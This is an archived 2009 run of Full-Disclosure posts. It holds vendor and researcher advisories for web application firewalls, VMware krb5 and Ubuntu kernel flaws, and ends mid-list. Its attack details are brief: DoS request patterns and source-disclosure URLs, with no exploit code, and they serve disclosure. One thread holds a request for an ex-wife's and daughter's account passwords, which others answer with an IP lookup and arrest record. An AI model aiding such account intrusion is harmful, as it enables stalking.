From sec08003 at fh-hagenberg.at Wed Jul 1 07:12:58 2009 From: sec08003 at fh-hagenberg.at (Kirchner Michael) Date: Wed, 1 Jul 2009 08:12:58 +0200 Subject: [Full-disclosure] phion airlock Web Application Firewall: Message-ID: <64892268E6E1E3419169504697FC7E555B1B7C@MXBE02.fhs-hagenberg.ac.at> Security Advisory --------------------------------------- Vulnerable Software: phion airlock Web Application Firewall Vulnerable Version: 4.1-10.41 Homepage: http://www.phion.com/ Found by: Michael Kirchner, Wolfgang Neudorfer, Lukas Nothdurfter (Team h4ck!nb3rg) Impact: Remote Denial of Service via Management Interface (unauthenticated) and Command Execution Product Description --------------------------------------- phion's web application firewall (WAF) airlock provides a unique combination of protective mechanisms for web applications. Whether you want to observe PCI DSS, safeguard online banking or protect e-commerce applications: airlock ensures sustained and manageable web application security. [Source: http://www.phion.com/INT/products/websecurity/Pages/default.aspx] Vulnerability Description --------------------------------------- The phion airlock Web Application Firewall operates as a reverse proxy between the clients and the web server to be protected. All HTTP requests are checked before being forwarded to the web server. The system can be administered via a seperate management interface which is normally not accessible for external users. By sending a specially crafted HTTP GET request an attacker with access to the management interface (but no authentication needed) is able to conduct a denial of service attack. The vendor describes the vulnerability as follows: "The airlock Configuration Center shows many system monitoring charts to check the system status and history. These images are generated on the fly by a CGI script, and the image size is part of the URL parameter. Unreasonably large values for the width and height parameters will cause excessive resource consumption. Depending on the actual load and the memory available, the system will be out-of-service for some minutes or crash completely, making a reboot necessary." [Source: https://techzone.phion.com/dos-vulnerability-4.1-sysmon-images] Further research showed that the vulnerability can also be used to execute arbitrary system commands. This allows attackers to run operating system commands under the user of the web server (uid=12359(wwwca) gid=54329(wwwca)). Proof of Conept --------------------------------------- A denial of service or execution of arbitrary system commands can be accomplished by a single HTTP request if an attacker can reach the management interface IP address of the WAF. According exploits will not be published. Vulnerable Versions --------------------------------------- The tested version was 4.1-10.41. Prior versions are also likely to be vulnerable. Patch --------------------------------------- The vendor provides a hotfix as well as an updated version of the product. The hotfix can be downloaded at: https://techzone.phion.com/hotfix_HF4112 Contact Timeline --------------------------------------- 2009-04-27: Vendor informed 2009-04-28: Inital vendor reply 2009-04-29: Vulnerability confirmed and manual workaround available at phion techzone 2009-05-12: Hotfix and updated version available 2009-07-01: Public release Further information --------------------------------------- Information about the web application firewall project this advisory originates from can be found at: http://www.h4ck1nb3rg.at/wafs/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090701/4f1910b5/attachment.html From sec08003 at fh-hagenberg.at Wed Jul 1 07:13:13 2009 From: sec08003 at fh-hagenberg.at (Kirchner Michael) Date: Wed, 1 Jul 2009 08:13:13 +0200 Subject: [Full-disclosure] radware AppWall Web Application Firewall: Source code disclosure on management interface Message-ID: <64892268E6E1E3419169504697FC7E555B1B7D@MXBE02.fhs-hagenberg.ac.at> Security Advisory --------------------------------------- Vulnerable Software: radware AppWall Web Application Firewall Vulnerable Version: Gateway Version 4.6.0.2 / AppWall Version 1.0.2.6 Homepage: http://www.radware.com/ Found by: Michael Kirchner, Wolfgang Neudorfer, Lukas Nothdurfter (Team h4ck!nb3rg) Impact: Source code disclosure on management interface Product Description --------------------------------------- Radware's AppWall is a Web application firewall (WAF) appliance that secures Web applications. It enables PCI compliance by mitigating Web application security threats and vulnerabilities to prevent data theft and manipulation of sensitive corporate and customer information. AppWall incorporates advanced, patent-protected Web application security filtering technologies to seamlessly detect threats, block attacks and report events. [Source: http://www.radware.com/Products/ApplicationDelivery/AppWall/default.aspx ] Vulnerability Description --------------------------------------- The radware AppWall Web Application Firewall operates as a reverse proxy between the clients and the web server to be protected. All HTTP requests are checked before being forwarded to the web server. The system can be administered via a seperate management interface which is normally not accessible for external users. The web interface is realised using the PHP programming language. Some of the functionality is stored in include files and embedded when needed. The files have a *.inc extension and are not interpreted by the web server. A user/attacker with access to the web management interface can therefore access parts of the product source code by requesting the included files directly. Proof of Conept --------------------------------------- The following example requests reveal product source code enabling an attacker to search for further implementation vulnerabilities: https://appwall/Management/funcs.inc https://appwall/Management/defines.inc https://appwall/Management/msg.inc Vulnerable Versions --------------------------------------- The tested version was Gateway Version 4.6.0.2 / AppWall Version 1.0.2.6. Prior versions are also likely to be vulnerable. Patch --------------------------------------- Currently we are not aware of any patch or update available. Contact Timeline --------------------------------------- 2009-06-01: Vendor informed 2009-06-15: No response yet. Vendor contacted again. 2009-06-15: Initial vendor reply (Support ticket opened) 2009-07-01: No response yet as far as the vulnerability is concerned. Public release Further information --------------------------------------- Information about the web application firewall project this advisory originates from can be found at: http://www.h4ck1nb3rg.at/wafs/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090701/ed1d9f3f/attachment.html From sec08003 at fh-hagenberg.at Wed Jul 1 07:12:43 2009 From: sec08003 at fh-hagenberg.at (Kirchner Michael) Date: Wed, 1 Jul 2009 08:12:43 +0200 Subject: [Full-disclosure] Artofdefence Hyperguard Web Application Firewall: Remote Denial of Service Message-ID: <64892268E6E1E3419169504697FC7E555B1B7B@MXBE02.fhs-hagenberg.ac.at> Security Advisory --------------------------------------- Vulnerable Software: Artofdefence Hyperguard Web Application Firewall Vulnerable Version: 3 branches: prior to 3.1.1-11637; prior to 3.0.3-11636; prior to 2.5.5-11635 (Apache Plug-in) Homepage: http://www.artofdefence.com/ Found by: Michael Kirchner, Wolfgang Neudorfer, Lukas Nothdurfter (Team h4ck!nb3rg) Impact: Remote Denial of Service Product Description --------------------------------------- Hyperguard is a latest-generation enterprise Web application firewall with attack detection and attack protection functions that are freely configurable. Hyperguard enables centralised security monitoring, reporting and alerting and provides custom protection for your Web applications against external attacks. [Source: http://www.artofdefence.com/en/hyperguard/hyperguard.html] Vulnerability Description --------------------------------------- The Artofdefence Hyperguard Web Application Firewall operates as a reverse proxy module between the clients and the web server to be protected. All HTTP requests are checked before being forwarded to the web server. By sending specially crafted HTTP POST requests an attacker is able to trigger high memory usage on the WAF. By repeatedly sending the request the available memory is exhausted resulting in a kernel panic and therefore a denial of service. The vulnerability can be triggered by sending HTTP POST requests with a high "Content-Length" header value set but without transmitting any content. Artofdefence Hyperguard is available as a plug-in for several web servers. The vulnerability was confirmed in connection with the Apache web server module. Other modules have not been tested. Proof of Conept --------------------------------------- With 1 GB of free memory available on the WAF the kernel panic occured after sending ~350 crafted requests. Vulnerable Versions --------------------------------------- The tested version was of the 3.1.1 branch prior to 3.1.1-11637. According to the vendor the other two branches were also vulnerable (see version description in the header). Patch --------------------------------------- The vendor provides an updated version of the product for all three branches (see version description in the header). Contact Timeline --------------------------------------- 2009-05-22: Vendor informed 2009-05-22: Inital vendor reply 2009-05-25: Vulnerability confirmed 2009-05-29: Patched version available 2009-07-01: Public release Further information --------------------------------------- Information about the web application firewall project this advisory originates from can be found at: http://www.h4ck1nb3rg.at/wafs/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090701/33ec7b99/attachment.html From security at vmware.com Wed Jul 1 08:10:21 2009 From: security at vmware.com (VMware Security Team) Date: Wed, 01 Jul 2009 00:10:21 -0700 Subject: [Full-disclosure] VMSA-2009-0008 ESX Service Console update for krb5 Message-ID: <4A4B0BDD.10706@vmware.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ VMware Security Advisory Advisory ID: VMSA-2009-0008 Synopsis: ESX Service Console update for krb5 Issue date: 2009-06-30 Updated on: 2009-06-30 (initial release of advisory) CVE numbers: CVE-2009-0846 - ------------------------------------------------------------------------ 1. Summary Service Console package krb5 has been updated to version krb5-1.2.7-70. 2. Relevant releases VMware ESX 3.5.0 without patch ESX350-200906407-SG 3. Problem Description a. Service Console package krb5 update to version krb5-1.2.7-70 Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. An input validation flaw in the asn1_decode_generaltime function in MIT Kerberos 5 before 1.6.4 allows remote attackers to cause a denial of service or possibly execute arbitrary code via vectors involving an invalid DER encoding that triggers a free of an uninitialized pointer. A remote attacker could use this flaw to crash a network service using the MIT Kerberos library, such as kadmind or krb5kdc, by causing it to dereference or free an uninitialized pointer or, possibly, execute arbitrary code with the privileges of the user running the service. NOTE: ESX by default is unaffected by this issue, the daemons kadmind and krb5kdc are not installed in ESX. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2009-0846 to this issue. The following table lists what action remediates the vulnerability (column 4) if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======== ======= ================= VirtualCenter any Windows not affected hosted * any any not affected ESXi 3.5 ESXi not affected ESX 4.0 ESX affected, patch pending ESX 3.5 ESX ESX350-200906407-SG ESX 3.0.3 ESX affected, patch pending ESX 3.0.2 ESX affected, patch pending ESX 2.5.5 ESX affected, patch pending * hosted products are VMware Workstation, Player, ACE, Server, Fusion. 4. Solution Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file. ESX --- ESX 3.5.0 ESX350-200906407-SG http://download3.vmware.com/software/vi/ESX350-200906407-SG.zip md5sum: 6b8079430b0958abbf77e944a677ac6b http://kb.vmware.com/kb/1011801 5. References CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0846 - ------------------------------------------------------------------------ 6. Change log 2009-06-30 VMSA-2009-0008 Initial security advisory after release of patches for ESX 3.5 on 2009-06-30. - ----------------------------------------------------------------------- 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Center http://www.vmware.com/security VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2009 VMware Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.8.3 (Build 4028) Charset: utf-8 wj8DBQFKSwuTS2KysvBH1xkRAoUdAJ9p880DOAAa1Eey+EhEYJKQwuHLtgCfVBku 2uDpvVwMPaKZA6dcNPJxENc= =GMve -----END PGP SIGNATURE----- From rokadeana at gmail.com Wed Jul 1 13:06:09 2009 From: rokadeana at gmail.com (Inbox (Main)) Date: Wed, 1 Jul 2009 14:06:09 +0200 Subject: [Full-disclosure] (no subject) In-Reply-To: <778719.69951.qm@web59104.mail.re1.yahoo.com> References: <778719.69951.qm@web59104.mail.re1.yahoo.com> Message-ID: <8746b310907010506x32ef0dc4v5bc5f3f0c40380fc@mail.gmail.com> Why not just ask michelle? Hope you don't mind: I forwarded your mail to michelle.nash2009 at yahoo.com 2009/7/1 mitch nash > would like passwords for e mail, facebook, and my space for > michelle.nash2009 at yahoo.com, and my space passwords for marlee_michelle. > (x wife and daughter) thank you, mitch nash > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090701/394216d7/attachment.html From nytrokiss at gmail.com Wed Jul 1 13:15:54 2009 From: nytrokiss at gmail.com (James Matthews) Date: Wed, 1 Jul 2009 15:15:54 +0300 Subject: [Full-disclosure] (no subject) In-Reply-To: <8746b310907010506x32ef0dc4v5bc5f3f0c40380fc@mail.gmail.com> References: <778719.69951.qm@web59104.mail.re1.yahoo.com> <8746b310907010506x32ef0dc4v5bc5f3f0c40380fc@mail.gmail.com> Message-ID: <8a6b8e350907010515k5a4c3633p409593b111d8503c@mail.gmail.com> LAMO! This is amazing! It made my day! You stupid stalker get a life and stay away from women! James On Wed, Jul 1, 2009 at 3:06 PM, Inbox (Main) wrote: > > Why not just ask michelle? > > Hope you don't mind: I forwarded your mail to michelle.nash2009 at yahoo.com > > > 2009/7/1 mitch nash > >> would like passwords for e mail, facebook, and my space for >> michelle.nash2009 at yahoo.com, and my space passwords for marlee_michelle. >> (x wife and daughter) thank you, mitch nash >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.goldwatches.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090701/50fe2079/attachment.html From kevin at tux.appstate.edu Wed Jul 1 14:31:38 2009 From: kevin at tux.appstate.edu (Kevin Wilcox) Date: Wed, 1 Jul 2009 09:31:38 -0400 Subject: [Full-disclosure] (no subject) In-Reply-To: <8746b310907010506x32ef0dc4v5bc5f3f0c40380fc@mail.gmail.com> References: <778719.69951.qm@web59104.mail.re1.yahoo.com> <8746b310907010506x32ef0dc4v5bc5f3f0c40380fc@mail.gmail.com> Message-ID: <5d6848b00907010631x3b361ce3h64299b8984f3414e@mail.gmail.com> 2009/7/1 Inbox (Main) : > > Why not just ask michelle? > > Hope you don't mind: I forwarded your mail to michelle.nash2009 at yahoo.com I'm guessing this could have something to do with it: http://www.nrtoday.com/article/20090619/LOGS/906199976/1051/NONE&parentprofile=1055 In particular, the section that says, "Mitchell Dale Nash, 45, of Myrtle Creek, on suspicion of violation of a restraining order, interfering with making a report, harassment and unlawful entry into a motor vehicle." I only mention that because the original email came in from 74.32.173.24...which gives us user at host ~ $ nslookup 74.32.173.24 Server: 152.10.248.1 Address: 152.10.248.1#53 Non-authoritative answer: 24.173.32.74.in-addr.arpa name = 74-32-173-24.dr01.myck.or.frontiernet.net. My favourite part is the "myck.or.frontiernet.net" section. Sounds like Myrtle Creek, Oregon, to me. Of course, I could be *completely* wrong... kmw -- To take from one, because it is thought that his own industry and that of his fathers has acquired too much, in order to spare to others, who, or whose fathers have not exercised equal industry and skill, is to violate arbitrarily the first principle of association, ?the guarantee to every one of a free exercise of his industry, & the fruits acquired by it.' From tomb at byrneit.net Wed Jul 1 19:28:23 2009 From: tomb at byrneit.net (Tomas L. Byrnes) Date: Wed, 1 Jul 2009 11:28:23 -0700 Subject: [Full-disclosure] (no subject) In-Reply-To: <5d6848b00907010631x3b361ce3h64299b8984f3414e@mail.gmail.com> References: <778719.69951.qm@web59104.mail.re1.yahoo.com><8746b310907010506x32ef0dc4v5bc5f3f0c40380fc@mail.gmail.com> <5d6848b00907010631x3b361ce3h64299b8984f3414e@mail.gmail.com> Message-ID: <70D072392E56884193E3D2DE09C097A91F41F1@pascal.zaphodb.org> Reported to the Douglas County Sheriffs on their crime report form. >-----Original Message----- >From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure- >bounces at lists.grok.org.uk] On Behalf Of Kevin Wilcox >Sent: Wednesday, July 01, 2009 6:32 AM >To: Inbox (Main) >Cc: full-disclosure at lists.grok.org.uk; michelle.nash2009 at yahoo.com; >mitch nash >Subject: Re: [Full-disclosure] (no subject) > >2009/7/1 Inbox (Main) : >> >> Why not just ask michelle? >> >> Hope you don't mind: I forwarded your mail to >michelle.nash2009 at yahoo.com > >I'm guessing this could have something to do with it: > >http://www.nrtoday.com/article/20090619/LOGS/906199976/1051/NONE&parentp >rofile=1055 > >In particular, the section that says, > >"Mitchell Dale Nash, 45, of Myrtle Creek, on suspicion of violation of >a restraining order, interfering with making a report, harassment and >unlawful entry into a motor vehicle." > >I only mention that because the original email came in from >74.32.173.24...which gives us > >user at host ~ $ nslookup 74.32.173.24 >Server: 152.10.248.1 >Address: 152.10.248.1#53 > >Non-authoritative answer: >24.173.32.74.in-addr.arpa name = >74-32-173-24.dr01.myck.or.frontiernet.net. > >My favourite part is the "myck.or.frontiernet.net" section. Sounds >like Myrtle Creek, Oregon, to me. > >Of course, I could be *completely* wrong... > >kmw > >-- >To take from one, because it is thought that his own industry and that >of his fathers has acquired too much, in order to spare to others, >who, or whose fathers have not exercised equal industry and skill, is >to violate arbitrarily the first principle of association, ?the >guarantee to every one of a free exercise of his industry, & the >fruits acquired by it.' > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From kz20fl at googlemail.com Wed Jul 1 20:52:00 2009 From: kz20fl at googlemail.com (James Rankin) Date: Wed, 1 Jul 2009 20:52:00 +0100 Subject: [Full-disclosure] (no subject) In-Reply-To: <70D072392E56884193E3D2DE09C097A91F41F1@pascal.zaphodb.org> References: <778719.69951.qm@web59104.mail.re1.yahoo.com> <8746b310907010506x32ef0dc4v5bc5f3f0c40380fc@mail.gmail.com> <5d6848b00907010631x3b361ce3h64299b8984f3414e@mail.gmail.com> <70D072392E56884193E3D2DE09C097A91F41F1@pascal.zaphodb.org> Message-ID: <8826b4700907011252p60ce6af0w75387933db63135e@mail.gmail.com> What a goon. That made me laugh till it hurt 2009/7/1 Tomas L. Byrnes > Reported to the Douglas County Sheriffs on their crime report form. > > > >-----Original Message----- > >From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure- > >bounces at lists.grok.org.uk] On Behalf Of Kevin Wilcox > >Sent: Wednesday, July 01, 2009 6:32 AM > >To: Inbox (Main) > >Cc: full-disclosure at lists.grok.org.uk; michelle.nash2009 at yahoo.com; > >mitch nash > >Subject: Re: [Full-disclosure] (no subject) > > > >2009/7/1 Inbox (Main) : > >> > >> Why not just ask michelle? > >> > >> Hope you don't mind: I forwarded your mail to > >michelle.nash2009 at yahoo.com > > > >I'm guessing this could have something to do with it: > > > >http://www.nrtoday.com/article/20090619/LOGS/906199976/1051/NONE&parentp > >rofile=1055 > > > >In particular, the section that says, > > > >"Mitchell Dale Nash, 45, of Myrtle Creek, on suspicion of violation of > >a restraining order, interfering with making a report, harassment and > >unlawful entry into a motor vehicle." > > > >I only mention that because the original email came in from > >74.32.173.24...which gives us > > > >user at host ~ $ nslookup 74.32.173.24 > >Server: 152.10.248.1 > >Address: 152.10.248.1#53 > > > >Non-authoritative answer: > >24.173.32.74.in-addr.arpa name = > >74-32-173-24.dr01.myck.or.frontiernet.net. > > > >My favourite part is the "myck.or.frontiernet.net" section. Sounds > >like Myrtle Creek, Oregon, to me. > > > >Of course, I could be *completely* wrong... > > > >kmw > > > >-- > >To take from one, because it is thought that his own industry and that > >of his fathers has acquired too much, in order to spare to others, > >who, or whose fathers have not exercised equal industry and skill, is > >to violate arbitrarily the first principle of association, ?the > >guarantee to every one of a free exercise of his industry, & the > >fruits acquired by it.' > > > >_______________________________________________ > >Full-Disclosure - We believe in it. > >Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090701/819e09e3/attachment.html From dan at losangelescomputerhelp.com Thu Jul 2 07:48:58 2009 From: dan at losangelescomputerhelp.com (Daniel H. Renner) Date: Wed, 01 Jul 2009 23:48:58 -0700 Subject: [Full-disclosure] "So long, and thanks for all the fish!" Message-ID: <4A4C585A.7030202@losangelescomputerhelp.com> Hello, Please excuse the corny subject line, but it is my farewell speech, and I couldn't help it... My apologies also if you received two copies of this note, as I wanted to ensure that everyone did in fact get a copy. The purpose of this email is to notify you of my moving on from the computer service business. I have recently come upon another service business opportunity that I have a lot of interest in, and as a result have transferred your contact information on to Jared, who has serviced most of you singly for the last 5 years, and Bill Johonnesson who recently joined the company in order to help out with the administrative end of things. Jared will continue to give you the same great service he always has, and Bill will do a great job of keeping the administration of the business in check and making sure that you are happy with your service. I have very much enjoyed servicing you in the computer field, and I am very sure that you will receive -continued excellent service from Jared & Bill. You can reach Jared and Bill at the same phone numbers you had for me (818-352-8700 & 818-400-4770) and for a short time via this email address of dan at losangelescomputerhelp.com. If you have any personal communication you would like to send me, you can email me at dan at engineecology.com. (The website is not up yet, but the email will work fine. If you are interested, please check in a couple of weeks.) My phone number has also changed to 818-808-6880. Again, this is for personal contact at this time. All computer related questions should go to the office numbers listed above. Thank you very much for your patronage, and my best wishes for your future. Sincerely, Dan Renner From i at r00t.ms Thu Jul 2 08:26:24 2009 From: i at r00t.ms (NOC) Date: Thu, 02 Jul 2009 00:26:24 -0700 Subject: [Full-disclosure] "So long, and thanks for all the fish!" In-Reply-To: <4A4C585A.7030202@losangelescomputerhelp.com> Message-ID: Tell me the new service business is male prostitution o.0 On 7/1/09 11:48 PM, "Daniel H. Renner" wrote: > Hello, > > Please excuse the corny subject line, but it is my farewell speech, and I > couldn't help it... > > My apologies also if you received two copies of this note, as I wanted to > ensure that everyone did in fact get a copy. > > The purpose of this email is to notify you of my moving on from the computer > service business. > > I have recently come upon another service business opportunity that I have a > lot of interest in, and as a result have transferred your contact information > on to Jared, who has serviced most of you singly for the last 5 years, and > Bill Johonnesson who recently joined the company in order to help out with the > administrative end of things. > > Jared will continue to give you the same great service he always has, and Bill > will do a great job of keeping the administration of the business in check and > making sure that you are happy with your service. > > I have very much enjoyed servicing you in the computer field, and I am very > sure that you will receive -continued excellent service from Jared & Bill. > > You can reach Jared and Bill at the same phone numbers you had for me > (818-352-8700 & 818-400-4770) and for a short time via this email address of > dan at losangelescomputerhelp.com. > > If you have any personal communication you would like to send me, you can > email me at dan at engineecology.com. > (The website is not up yet, but the email will work fine. If you are > interested, please check in a couple of weeks.) > > My phone number has also changed to 818-808-6880. Again, this is for personal > contact at this time. All computer related questions should go to the office > numbers listed above. > > Thank you very much for your patronage, and my best wishes for your future. > > > Sincerely, > Dan Renner > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > > !DSPAM:1,4a4c6197113551287017954! From kees at ubuntu.com Thu Jul 2 06:44:22 2009 From: kees at ubuntu.com (Kees Cook) Date: Wed, 1 Jul 2009 22:44:22 -0700 Subject: [Full-disclosure] [USN-793-1] Linux kernel vulnerabilities Message-ID: <20090702054422.GC7922@outflux.net> =========================================================== Ubuntu Security Notice USN-793-1 July 02, 2009 linux, linux-source-2.6.15 vulnerabilities CVE-2009-1072, CVE-2009-1184, CVE-2009-1192, CVE-2009-1242, CVE-2009-1265, CVE-2009-1336, CVE-2009-1337, CVE-2009-1338, CVE-2009-1360, CVE-2009-1385, CVE-2009-1439, CVE-2009-1630, CVE-2009-1633, CVE-2009-1914, CVE-2009-1961 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: linux-image-2.6.15-54-386 2.6.15-54.77 linux-image-2.6.15-54-686 2.6.15-54.77 linux-image-2.6.15-54-amd64-generic 2.6.15-54.77 linux-image-2.6.15-54-amd64-k8 2.6.15-54.77 linux-image-2.6.15-54-amd64-server 2.6.15-54.77 linux-image-2.6.15-54-amd64-xeon 2.6.15-54.77 linux-image-2.6.15-54-hppa32 2.6.15-54.77 linux-image-2.6.15-54-hppa32-smp 2.6.15-54.77 linux-image-2.6.15-54-hppa64 2.6.15-54.77 linux-image-2.6.15-54-hppa64-smp 2.6.15-54.77 linux-image-2.6.15-54-itanium 2.6.15-54.77 linux-image-2.6.15-54-itanium-smp 2.6.15-54.77 linux-image-2.6.15-54-k7 2.6.15-54.77 linux-image-2.6.15-54-mckinley 2.6.15-54.77 linux-image-2.6.15-54-mckinley-smp 2.6.15-54.77 linux-image-2.6.15-54-powerpc 2.6.15-54.77 linux-image-2.6.15-54-powerpc-smp 2.6.15-54.77 linux-image-2.6.15-54-powerpc64-smp 2.6.15-54.77 linux-image-2.6.15-54-server 2.6.15-54.77 linux-image-2.6.15-54-server-bigiron 2.6.15-54.77 linux-image-2.6.15-54-sparc64 2.6.15-54.77 linux-image-2.6.15-54-sparc64-smp 2.6.15-54.77 Ubuntu 8.04 LTS: linux-image-2.6.24-24-386 2.6.24-24.55 linux-image-2.6.24-24-generic 2.6.24-24.55 linux-image-2.6.24-24-hppa32 2.6.24-24.55 linux-image-2.6.24-24-hppa64 2.6.24-24.55 linux-image-2.6.24-24-itanium 2.6.24-24.55 linux-image-2.6.24-24-lpia 2.6.24-24.55 linux-image-2.6.24-24-lpiacompat 2.6.24-24.55 linux-image-2.6.24-24-mckinley 2.6.24-24.55 linux-image-2.6.24-24-openvz 2.6.24-24.55 linux-image-2.6.24-24-powerpc 2.6.24-24.55 linux-image-2.6.24-24-powerpc-smp 2.6.24-24.55 linux-image-2.6.24-24-powerpc64-smp 2.6.24-24.55 linux-image-2.6.24-24-rt 2.6.24-24.55 linux-image-2.6.24-24-server 2.6.24-24.55 linux-image-2.6.24-24-sparc64 2.6.24-24.55 linux-image-2.6.24-24-sparc64-smp 2.6.24-24.55 linux-image-2.6.24-24-virtual 2.6.24-24.55 linux-image-2.6.24-24-xen 2.6.24-24.55 Ubuntu 8.10: linux-image-2.6.27-14-generic 2.6.27-14.35 linux-image-2.6.27-14-server 2.6.27-14.35 linux-image-2.6.27-14-virtual 2.6.27-14.35 Ubuntu 9.04: linux-image-2.6.28-13-generic 2.6.28-13.45 linux-image-2.6.28-13-imx51 2.6.28-13.45 linux-image-2.6.28-13-iop32x 2.6.28-13.45 linux-image-2.6.28-13-ixp4xx 2.6.28-13.45 linux-image-2.6.28-13-lpia 2.6.28-13.45 linux-image-2.6.28-13-server 2.6.28-13.45 linux-image-2.6.28-13-versatile 2.6.28-13.45 linux-image-2.6.28-13-virtual 2.6.28-13.45 After a standard system upgrade you need to reboot your computer to effect the necessary changes. ATTENTION: Due to an unavoidable ABI change for Ubuntu 8.04 and 8.10, the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well. Details follow: Igor Zhbanov discovered that NFS clients were able to create device nodes even when root_squash was enabled. An authenticated remote attacker could create device nodes with open permissions, leading to a loss of privacy or escalation of privileges. Only Ubuntu 8.10 and 9.04 were affected. (CVE-2009-1072) Dan Carpenter discovered that SELinux did not correctly handle certain network checks when running with compat_net=1. A local attacker could exploit this to bypass network checks. Default Ubuntu installations do not enable SELinux, and only Ubuntu 8.10 and 9.04 were affected. (CVE-2009-1184) Shaohua Li discovered that memory was not correctly initialized in the AGP subsystem. A local attacker could potentially read kernel memory, leading to a loss of privacy. (CVE-2009-1192) Benjamin Gilbert discovered that the VMX implementation of KVM did not correctly handle certain registers. An attacker in a guest VM could exploit this to cause a host system crash, leading to a denial of service. This only affected 32bit hosts. Ubuntu 6.06 was not affected. (CVE-2009-1242) Thomas Pollet discovered that the Amateur Radio X.25 Packet Layer Protocol did not correctly validate certain fields. A remote attacker could exploit this to read kernel memory, leading to a loss of privacy. (CVE-2009-1265) Trond Myklebust discovered that NFS did not correctly handle certain long filenames. An authenticated remote attacker could exploit this to cause a system crash, leading to a denial of service. Only Ubuntu 6.06 was affected. (CVE-2009-1336) Oleg Nesterov discovered that the kernel did not correctly handle CAP_KILL. A local user could exploit this to send signals to arbitrary processes, leading to a denial of service. (CVE-2009-1337) Daniel Hokka Zakrisson discovered that signal handling was not correctly limited to process namespaces. A local user could bypass namespace restrictions, possibly leading to a denial of service. Only Ubuntu 8.04 was affected. (CVE-2009-1338) Pavel Emelyanov discovered that network namespace support for IPv6 was not correctly handled. A remote attacker could send specially crafted IPv6 traffic that would cause a system crash, leading to a denial of service. Only Ubuntu 8.10 and 9.04 were affected. (CVE-2009-1360) Neil Horman discovered that the e1000 network driver did not correctly validate certain fields. A remote attacker could send a specially crafted packet that would cause a system crash, leading to a denial of service. (CVE-2009-1385) Pavan Naregundi discovered that CIFS did not correctly check lengths when handling certain mount requests. A remote attacker could send specially crafted traffic to cause a system crash, leading to a denial of service. (CVE-2009-1439) Simon Vallet and Frank Filz discovered that execute permissions were not correctly handled by NFSv4. A local user could bypass permissions and run restricted programs, possibly leading to an escalation of privileges. (CVE-2009-1630) Jeff Layton and Suresh Jayaraman discovered buffer overflows in the CIFS client code. A malicious remote server could exploit this to cause a system crash or execute arbitrary code as root. (CVE-2009-1633) Mikulas Patocka discovered that /proc/iomem was not correctly initialized on Sparc. A local attacker could use this file to crash the system, leading to a denial of service. Ubuntu 6.06 was not affected. (CVE-2009-1914) Miklos Szeredi discovered that OCFS2 did not correctly handle certain splice operations. A local attacker could exploit this to cause a system hang, leading to a denial of service. Ubuntu 6.06 was not affected. (CVE-2009-1961) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77.diff.gz Size/MD5: 3001537 eba4f5e0c7a98a38dea67bfa3e168240 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77.dsc Size/MD5: 2400 4ddbb75d160d27e0385fbabe7f1ee16a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d Architecture independent packages: 